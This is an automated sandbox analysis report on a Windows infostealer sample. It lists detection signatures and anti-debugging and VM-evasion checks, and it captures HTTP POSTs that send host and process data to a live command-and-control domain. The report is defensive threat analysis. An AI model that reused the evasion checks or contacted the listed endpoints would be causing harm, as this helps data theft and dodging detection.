Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fnuFOEqg4j.exe

Overview

General Information

Sample name:fnuFOEqg4j.exe
renamed because original name is a hash value
Original sample name:61039d97d478405525707e3c0b4b3003.exe
Analysis ID:1578959
MD5:61039d97d478405525707e3c0b4b3003
SHA1:501cf467cd61ca88a1e0991c2d7899a97237d8ff
SHA256:be39f15bfaeb90c138dbbc06f647ba537c5b451459343b9ef2a5583c0a02a89c
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Entry point lies outside standard sections
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • fnuFOEqg4j.exe (PID: 6988 cmdline: "C:\Users\user\Desktop\fnuFOEqg4j.exe" MD5: 61039D97D478405525707E3C0B4B3003)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: fnuFOEqg4j.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: fnuFOEqg4j.exeReversingLabs: Detection: 65%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: fnuFOEqg4j.exeJoe Sandbox ML: detected
Source: fnuFOEqg4j.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: fnuFOEqg4j.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 506466Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 30 38 30 39 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global trafficHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 128Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 5c 2f 68 31 3e 5c 6e 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html><body><h1>504 Gateway Time-out<\/h1>\nThe server didn't respond in time.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox ViewIP Address: 98.85.100.80 98.85.100.80
Source: Joe Sandbox ViewIP Address: 147.45.113.159 147.45.113.159
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.twentytk20pn.top
Source: unknownHTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: */*Content-Type: application/jsonContent-Length: 506466Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 30 38 30 39 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: fnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
Source: fnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
Source: fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322
Source: fnuFOEqg4j.exe, 00000000.00000002.2841276456.000000000162E000.00000004.00000020.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
Source: fnuFOEqg4j.exe, 00000000.00000002.2841276456.000000000162E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322::3
Source: fnuFOEqg4j.exe, fnuFOEqg4j.exe, 00000000.00000003.2838493021.0000000001662000.00000004.00000020.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2841593023.0000000001664000.00000004.00000020.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000003.2838749363.0000000001664000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=
Source: fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBF
Source: fnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
Source: fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: fnuFOEqg4j.exe, fnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: fnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ip
Source: fnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710

System Summary

barindex
PE file contains section with special chars
Source: fnuFOEqg4j.exeStatic PE information: section name:
Source: fnuFOEqg4j.exeStatic PE information: section name: .idata
Source: fnuFOEqg4j.exeStatic PE information: section name:
Source: fnuFOEqg4j.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: fnuFOEqg4j.exeStatic PE information: Section: jjnhjgow ZLIB complexity 0.9944498462373372
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: fnuFOEqg4j.exeReversingLabs: Detection: 65%
Source: fnuFOEqg4j.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: fnuFOEqg4j.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeSection loaded: kernel.appcore.dllJump to behavior
Source: fnuFOEqg4j.exeStatic file information: File size 4421632 > 1048576
Source: fnuFOEqg4j.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x283e00
Source: fnuFOEqg4j.exeStatic PE information: Raw size of jjnhjgow is bigger than: 0x100000 < 0x1afe00

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeUnpacked PE file: 0.2.fnuFOEqg4j.exe.4a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jjnhjgow:EW;esuyrufd:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jjnhjgow:EW;esuyrufd:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: fnuFOEqg4j.exeStatic PE information: real checksum: 0x445011 should be: 0x445019
Source: fnuFOEqg4j.exeStatic PE information: section name:
Source: fnuFOEqg4j.exeStatic PE information: section name: .idata
Source: fnuFOEqg4j.exeStatic PE information: section name:
Source: fnuFOEqg4j.exeStatic PE information: section name: jjnhjgow
Source: fnuFOEqg4j.exeStatic PE information: section name: esuyrufd
Source: fnuFOEqg4j.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeCode function: 0_3_016BF3E8 push eax; ret 0_3_016BF3E9
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeCode function: 0_3_016BF3E8 push eax; ret 0_3_016BF3E9
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeCode function: 0_3_016BF3E8 push eax; ret 0_3_016BF3E9
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeCode function: 0_3_016BF3E8 push eax; ret 0_3_016BF3E9
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeCode function: 0_3_016C0FF3 push ds; retf 0_3_016C1012
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeCode function: 0_3_016C0FF3 push ds; retf 0_3_016C1012
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeCode function: 0_3_016C0FF3 push ds; retf 0_3_016C1012
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeCode function: 0_3_016C0FF3 push ds; retf 0_3_016C1012
Source: fnuFOEqg4j.exeStatic PE information: section name: jjnhjgow entropy: 7.956153256454164

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: fnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PROCMON.EXE
Source: fnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: X64DBG.EXE
Source: fnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WINDBG.EXE
Source: fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: fnuFOEqg4j.exe, 00000000.00000003.2384600700.00000000072DF000.00000004.00001000.00020000.00000000.sdmp, fnuFOEqg4j.exe, 00000000.00000002.2839599462.0000000000950000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: ABD98F second address: ABD9AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19CEC1DCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edi 0x0000000c jc 00007FC19CEC1DCCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C2DFFD second address: C2E001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C2E001 second address: C2E00D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 js 00007FC19CEC1DC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C2E00D second address: C2E024 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC19D472F2Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FC19D472F26h 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C2D01D second address: C2D021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C2D021 second address: C2D03C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jg 00007FC19D472F26h 0x0000000d jng 00007FC19D472F26h 0x00000013 pop ebx 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C2D03C second address: C2D040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C2D040 second address: C2D050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jo 00007FC19D472F26h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\fnuFOEqg4j.exeRDTSC instruction interceptor: First address: C2D30C second address: C2D325 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC19CEC1DD0h 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
